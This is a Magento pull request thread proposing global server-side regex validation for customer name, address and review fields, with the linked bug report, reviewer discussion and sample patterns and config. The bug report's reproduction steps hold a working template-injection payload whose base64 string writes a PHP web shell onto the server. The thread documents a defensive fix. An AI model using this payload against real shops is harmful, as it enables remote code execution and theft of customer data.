### PR TITLE
Enhanced Customer Data Validation to Mitigate Code Injection Risks

### LINKED ISSUE #39002: Checkout address forms allow random code in the name fields
### Preconditions and environment

Magento version - 2.4.7-p1

### Steps to reproduce

1. Install a fresh Magento latest version with sample data
2. Add to a product to shopping cart and navigate to the checkout page (either as guest or as logged in user)
3. Provide the following code in the First name and Last name fields (shipping and billing address fields)
{{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

### Expected result

Magento should not allow to proceed by throwing an error

### Actual result

Magento allows the user to proceed further without throwing an error

### Additional information

Similar issue is already raised and resolved here - https://github.com/magento/magento2/issues/38331

### Release note

_No response_

### Triage and priority

- [X] Severity: **S0** _- Affects critical data or functionality and leaves users without workaround._
- [ ] Severity: **S1** _- Affects critical data or functionality and forces users to employ a workaround._
- [ ] Severity: **S2** _- Affects non-critical data or functionality and forces users to employ a workaround._
- [ ] Severity: **S3** _- Affects non-critical data or functionality and does not force users to employ a workaround._
- [ ] Severity: **S4** _- Affects aesthetics, professional look and feel, “quality” or “usability”._

### PR DESCRIPTION
**Pull request by in-session**
This Pull Request introduces several significant improvements to the validation process in Magento:

**Centralized Validation for Customer Fields:**

The validation logic for customer-related fields (such as names, phone numbers, and addresses) has been moved to global validators. This change ensures that consistent validation rules are applied across the entire application, improving both maintainability and reliability.

**Enhanced Field Validation Tests:**

The validation tests for customer fields have been significantly extended. This includes more comprehensive checks for various character sets, ensuring that fields such as city names, street addresses, and customer names are validated against a wide range of acceptable characters while preventing invalid inputs.

**Implementation of Global Forbidden Patterns:**

A new GlobalForbiddenPatterns validator has been introduced to mitigate the risk of code injection. This validator applies a set of global regex patterns designed to detect and block potentially malicious input, thereby enhancing the security of the application.

to fix the issus: 
- Fixes https://github.com/magento/magento2/issues/39002
- Extend https://github.com/magento/magento2/pull/38345

The pull is aimed at all public areas such as Checkout, Register Newsletter and Review, I hope I haven't forgotten anyone 

**Before:**
Checkout:
There was no server-side validation of the fields, which enabled code injection:

Review:
image
image

Contact:
image

**After**

The patterns from merge #38345 were made globally available and integrated into the quote, this already minimises code injection:
image

However, there are many other fields that do not run through the pattern, so the GlobalForbiddenPatterns was created, which can be activated via the admin:
image

This checks the data again to prevent code injection, for example the company field:
image

Review:
image

Create Account:
image

### CODE REVIEW

**Comment by in-session** [comment]
to fix the issus: https://github.com/magento/magento2/issues/39002

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run Functional Tests B2B, Functional Tests CE, Functional Tests EE, Magento Health Index, Unit Tests tests

**Comment by in-session** [comment]
https://github.com/magento run Functional Tests B2B, Functional Tests CE, Functional Tests EE, Magento Health Index, Unit Tests

**Comment by shubham-kiwicommerce** [comment]
@in-session any progress on this patch

**Comment by in-session** [comment]
https://github.com/magento run all tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@shubham-kiwicommerce This is currently still in draft status

**Comment by in-session** [comment]
@magento give me test instance

**Comment by in-session** [comment]
Draft

**Comment by in-session** [comment]
https://github.com/magento give me test instance

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@magento give me test instance

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@engcom-Hotel can you please set to S1 and Security

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@magento give me test instance

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@engcom-Bravo thanks for add some Labels 

I am currently on vacation and will continue to work on it next week.the goal is to introduce global pattern and secure all frontend accesses. Login, share data, register, checkout, review form etc.

**Comment by ihor-sviziev** [comment]
@in-session, Wasn't it fixed in https://github.com/magento/magento2/pull/38345?

**Comment by in-session** [comment]
@ihor-sviziev No, because the values only refer to City, Telephone and street. I will continue with this this week. We are currently experiencing the problem with many customers attempting code injection.

**Comment by ihor-sviziev** [comment]
Don't you think you're trying to invent Web Application Firewall?
I think these rules has to be configured in WAF, ideally automatically by WAF suppliers

**Comment by in-session** [comment]
@ihor-sviziev WAF is certainly the right approach, but the core must be secured from the core. It makes no sense to keep having new CVEs which enable code injection. Especially the validation of open areas such as login, registration, checkout etc. must be secured directly. And in my opinion I cannot understand why Magento has not already done this, the technology has been known for several years. So why not validate the request on the server side beforehand to further limit this?

**Comment by engcom-Hotel** [comment]
Hello @in-session,

It seems the PR is still under development. Hence moving it to `Draft` status. 

Thanks

**Comment by in-session** [comment]
@engcom-Delta @sidolov 
I won't continue because the changes are too far-reaching in the core, even if the approach should be the right one. As Adobe favours the cloud, a merge would not be available before the next 16 months. Therefore, unfortunately, you can only do it yourself and you should programme the validation yourself.

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
City and Street still need to be outsourced as global and integrated into the quote

**Comment by in-session** [comment]
@magento give me test instance

**Comment by in-session** [comment]
@magento give me test instance

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
Before:
There was no server-side validation of the fields, which enabled code injection:


The patterns from merge #38345 were made globally available and integrated into the quote, this already minimises code injection:
image

However, there are many other fields that do not run through the pattern, so the GlobalForbiddenPatterns was created, which can be activated via the admin:
image

This checks the data again to prevent code injection, for example the company field:
image

**Comment by in-session** [comment]
@magento run Static Tests, WebAPI Tests, Unit Tests

**Comment by in-session** [comment]
To Do:

image
image

**Comment by in-session** [comment]
https://github.com/magento give me test instance

**Comment by in-session** [comment]
@magento give me test instance

**Comment by in-session** [comment]
@magento give me test instance

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@magento run WebAPI Tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run Integration Tests

**Comment by in-session** [comment]
@magento run Integration Tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento run WebAPI Tests, Unit Tests, Static Tests

**Comment by in-session** [comment]
@magento run Functional Tests CE, WebAPI Tests, Unit Tests, Static Tests

**Comment by in-session** [comment]
@magento run Functional Tests CE, WebAPI Tests

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@magento give me test instance

**Comment by in-session** [comment]
@magento run all tests

**Comment by in-session** [comment]
@engcom-Bravo @engcom-Delta @ihor-sviziev 
Due to a time pass, I won't be able to continue for another 2-3 weeks. 
Basically, I believe that the global validations are the right approach to better protect the system.
But I have to make sure that the validation is done via validation.xml, I still have to think about it.

But in any case, the merge should be done on hold first: https://github.com/magento/magento2/pull/38345
The patterns are too restrictive and would lead to problems with most international shops. 

You should do it more along the lines of the current pull:
```
private const PATTERN_CITY = '/^[\p{L}\p{M}\s\-\.\'\&\[\]\(\):]{1,100}$/u';
private const PATTERN_NAME = '/(?:[\p{L}\p{M}\,\-\_\.\'’`&\s\d]){1,255}+/u';
private const PATTERN_TELEPHONE = '/(?:[\d\s\+\-\()\/]{1,30})/u';
private const PATTERN_STREET = "/^[\p{L}\p{M}\,\-\.\'’`&\s\d\[\]\(\)]{1,255}$/u";
```
That's why I extended the test accordingly here.

I think it would be better to activate or deactivate the regex via admin, for example:
```
<group id="security" translate="label" type="text" sortOrder="60" showInDefault="1" showInWebsite="1">
                <label>Security</label>
                <field id="security_regex_enabled" translate="label" type="select" sortOrder="10" showInDefault="1" showInWebsite="1" showInStore="1">
                    <label>Activate Field Regex Function</label>
                    <source_model>Magento\Config\Model\Config\Source\Yesno</source_model>
                    <comment>Activate the extended field regex function.</comment>
                </field>
                <field id="security_regex_city_enabled" translate="label" type="select" sortOrder="20" showInDefault="1" showInWebsite="1" showInStore="1">
                    <label>Enable City Regex Validation</label>
                    <source_model>Magento\Config\Model\Config\Source\Yesno</source_model>
                    <depends>
                        <field_id>security_regex_enabled</field_id>
                        <value>1</value>
                    </depends>
                    <comment>Enable or disable regex validation for city fields.</comment>
                </field>
                <field id="security_regex_name_enabled" translate="label" type="select" sortOrder="30" showInDefault="1" showInWebsite="1" showInStore="1">
                    <label>Enable Name Regex Validation</label>
                    <source_model>Magento\Config\Model\Config\Source\Yesno</source_model>
                    <depends>
                        <field_id>security_regex_enabled</field_id>
                        <value>1</value>
                    </depends>
                    <comment>Enable or disable regex validation for name fields.</comment>
                </field>
                <field id="security_regex_telephone_enabled" translate="label" type="select" sortOrder="40" showInDefault="1" showInWebsite="1" showInStore="1">
                    <label>Enable Telephone Regex Validation</label>
                    <source_model>Magento\Config\Model\Config\Source\Yesno</source_model>
                    <depends>
                        <field_id>security_regex_enabled</field_id>
                        <value>1</value>
                    </depends>
                    <comment>Enable or disable regex validation for telephone fields.</comment>
                </field>
                <field id="security_regex_street_enabled" translate="label" type="select" sortOrder="50" showInDefault="1" showInWebsite="1" showInStore="1">
                    <label>Enable Street Regex Validation</label>
                    <source_model>Magento\Config\Model\Config\Source\Yesno</source_model>
                    <depends>
                        <field_id>security_regex_enabled</field_id>
                        <value>1</value>
                    </depends>
                    <comment>Enable or disable regex validation for street fields.</comment>
                </field>
                <field id="security_code_injection_enabled" translate="label" type="select" sortOrder="10" showInDefault="1" showInWebsite="1" showInStore="1">
                    <label>Activate regex function</label>
                    <source_model>Magento\Config\Model\Config\Source\Yesno</source_model>
                    <comment>Activate the extended regex function to limit code injection.</comment>
                </field>
            </group>
```

In a test I had tried if you could possibly set the regex via admin that would be better in the long term, unfortunately this is technically not possible.

**Comment by engcom-Hotel** [comment]
Hello @in-session,

It seems you are still working on this PR, hence moving it to `On Hold`. Please let us know once you are ready with this, we will pick this for further processing.

Thanks

**Comment by in-session** [comment]
@engcom-Hotel
I close the PR because another PR is better #39131

**Pull request closed without merging**
